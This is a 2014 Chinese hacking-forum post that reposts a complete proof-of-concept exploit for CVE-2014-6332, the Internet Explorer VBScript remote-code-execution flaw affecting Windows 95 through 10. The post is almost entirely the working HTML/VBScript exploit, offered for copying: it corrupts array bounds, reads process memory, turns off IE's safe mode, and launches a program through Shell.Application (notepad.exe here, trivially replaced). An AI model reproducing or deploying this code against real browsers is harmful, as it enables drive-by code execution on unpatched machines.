搜索
查看: 616|回复: 0

win95+ie3-win10+ie11全版本执行漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-11-14 21:00:00 | 显示全部楼层 |阅读模式
微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332),可以说是给windows吃了一颗大补丸。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。袁哥的眼泪哗哗的。随便一个ie,必弹计算器。
CVE-2014-6332 alliedve.htm allie(win95+ie3-win10+ie11) dve copy by yuange in 2009
  1. //*
  2.    allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.

  3. https://twitter.com/yuange75


  4. http://hi.baidu.com/yuange1975

  5. *//

  6. <!doctype html>
  7. <html>
  8. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
  9. <head>
  10. </head>
  11. <body>

  12. <SCRIPT LANGUAGE="VBScript">

  13. function runmumaa()
  14. On Error Resume Next
  15. set shell=createobject("Shell.Application")
  16. shell.ShellExecute "notepad.exe"
  17. end function

  18. </script>

  19. <SCRIPT LANGUAGE="VBScript">

  20. dim   aa()
  21. dim   ab()
  22. dim   a0
  23. dim   a1
  24. dim   a2
  25. dim   a3
  26. dim   win9x
  27. dim   intVersion
  28. dim   rnda
  29. dim   funclass
  30. dim   myarray

  31. Begin()

  32. function Begin()
  33.   On Error Resume Next
  34.   info=Navigator.UserAgent

  35.   if(instr(info,"Win64")>0)   then
  36.      exit   function
  37.   end if

  38.   if (instr(info,"MSIE")>0)   then
  39.              intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  40.   else
  41.      exit   function  
  42.             
  43.   end if

  44.   win9x=0

  45.   BeginInit()
  46.   If Create()=True Then
  47.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  48.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

  49.      if(intVersion<4) then
  50.          document.write("<br> IE")
  51.          document.write(intVersion)
  52.          runshellcode()                    
  53.      else  
  54.           setnotsafemode()
  55.      end if
  56.   end if
  57. end function

  58. function BeginInit()
  59.    Randomize()
  60.    redim aa(5)
  61.    redim ab(5)
  62.    a0=13+17*rnd(6)
  63.    a3=7+3*rnd(5)
  64. end function

  65. function Create()
  66.   On Error Resume Next
  67.   dim i
  68.   Create=False
  69.   For i = 0 To 400
  70.     If Over()=True Then
  71.     '   document.write(i)     
  72.        Create=True
  73.        Exit For
  74.     End If
  75.   Next
  76. end function

  77. sub testaa()
  78. end sub

  79. function mydata()
  80.     On Error Resume Next
  81.      i=testaa
  82.      i=null
  83.      redim  Preserve aa(a2)  
  84.   
  85.      ab(0)=0
  86.      aa(a1)=i
  87.      ab(0)=6.36598737437801E-314

  88.      aa(a1+2)=myarray
  89.      ab(2)=1.74088534731324E-310  
  90.      mydata=aa(a1)
  91.      redim  Preserve aa(a0)  
  92. end function


  93. function setnotsafemode()
  94.     On Error Resume Next
  95.     i=mydata()  
  96.     i=readmemo(i+8)
  97.     i=readmemo(i+16)
  98.     j=readmemo(i+&h134)  
  99.     for k=0 to &h60 step 4
  100.         j=readmemo(i+&h120+k)
  101.         if(j=14) then
  102.               j=0         
  103.               redim  Preserve aa(a2)            
  104.      aa(a1+2)(i+&h11c+k)=ab(4)
  105.               redim  Preserve aa(a0)  

  106.      j=0
  107.               j=readmemo(i+&h120+k)   
  108.          
  109.                Exit for
  110.            end if

  111.     next
  112.     ab(2)=1.69759663316747E-313
  113.     runmumaa()
  114. end function

  115. function Over()
  116.     On Error Resume Next
  117.     dim type1,type2,type3
  118.     Over=False
  119.     a0=a0+a3
  120.     a1=a0+2
  121.     a2=a0+&h8000000
  122.   
  123.     redim  Preserve aa(a0)
  124.     redim   ab(a0)     
  125.   
  126.     redim  Preserve aa(a2)
  127.   
  128.     type1=1
  129.     ab(0)=1.123456789012345678901234567890
  130.     aa(a0)=10
  131.          
  132.     If(IsObject(aa(a1-1)) = False) Then
  133.        if(intVersion<4) then
  134.            mem=cint(a0+1)*16            
  135.            j=vartype(aa(a1-1))
  136.            if((j=mem+4) or (j*8=mem+8)) then
  137.               if(vartype(aa(a1-1))<>0)  Then   
  138.                  If(IsObject(aa(a1)) = False ) Then            
  139.                    type1=VarType(aa(a1))
  140.                  end if               
  141.               end if
  142.            else
  143.              redim  Preserve aa(a0)
  144.              exit  function

  145.            end if
  146.         else
  147.            if(vartype(aa(a1-1))<>0)  Then   
  148.               If(IsObject(aa(a1)) = False ) Then
  149.                   type1=VarType(aa(a1))
  150.               end if               
  151.             end if
  152.         end if
  153.     end if
  154.               
  155.    
  156.     If(type1=&h2f66) Then         
  157.           Over=True      
  158.     End If  
  159.     If(type1=&hB9AD) Then
  160.           Over=True
  161.           win9x=1
  162.     End If  

  163.     redim  Preserve aa(a0)         
  164.         
  165. end function

  166. function ReadMemo(add)
  167.     On Error Resume Next
  168.     redim  Preserve aa(a2)  
  169.   
  170.     ab(0)=0   
  171.     aa(a1)=add+4     
  172.     ab(0)=1.69759663316747E-313      
  173.     ReadMemo=lenb(aa(a1))  
  174.    
  175.     ab(0)=0   

  176.     redim  Preserve aa(a0)
  177. end function

  178. </script>

  179. </body>
  180. </html>
复制代码

原文来自:http://hi.baidu.com/yuange1975/item/c846a94d76fe00a861d7b900
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表